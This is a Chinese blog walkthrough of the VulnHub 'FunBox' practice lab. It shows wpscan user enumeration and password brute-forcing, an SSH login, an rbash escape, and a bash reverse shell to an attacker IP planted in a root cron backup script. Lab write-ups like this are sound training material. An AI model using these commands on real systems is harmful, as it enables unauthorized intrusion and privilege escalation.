VulnHub_FunBox


发现目标主机

我们使用nmap扫描整个网段

sudo nmap 192.168.1.0/24

扫描端口

使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口

sudo nmap -A 192.168.1.14


使用IP访问时发现会跳转到funbox.fritz.box域名,我们需要再hosts文件中加入映射关系才能正常访问

添加之后通过域名访问发现这是一个WordPress搭建的网站

我们先用wpscan扫描一下用户,得到admin和joe两个用户

sudo wpscan --url http://funbox.fritz.box/ --enumerate u


我们创建一个用户字典然后进行密码爆破

sudo wpscan --url http://funbox.fritz.box/ -U ~/Desktop/VulnHub/FunBox/username -P /usr/share/wordlists/rockyou.txt


得到密码之后,由于服务器开放了22端口,我们先连接服务器试试

ssh joe@192.168.1.14


我们发现joe用户可以成功连接到服务器
但是,当我们想切换到其他目录的时候,发现这是一个受限的rbash

使用bash -i即可绕过限制

我们查看joe家目录下的mbox文件发现了一句提示语,在funny的家目录下有一个备份脚本,让我们告诉他完成了。

Hi Joe, please tell funny the backupscript is done.


进入funny的家目录我们发现本脚本是一个隐藏文件

查看脚本内容即是将var/www/html备份到funny的家目录下

查看了一下时间发现文件最后修改时间和现在时间进行对比,这应该是一个定时执行的脚本

通过观察脚本差不多2-5分钟执行一次,我们在脚本里写入一个反弹shell

bash -i >& /dev/tcp/192.168.1.6/1234 0>&1


等几分钟即可返回一个shell

通过观察funny权限脚本1分钟执行一次,root权限5分钟执行一次,所以如果返回的不是root权限可以多试几次
查看Flag

福利来啦

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值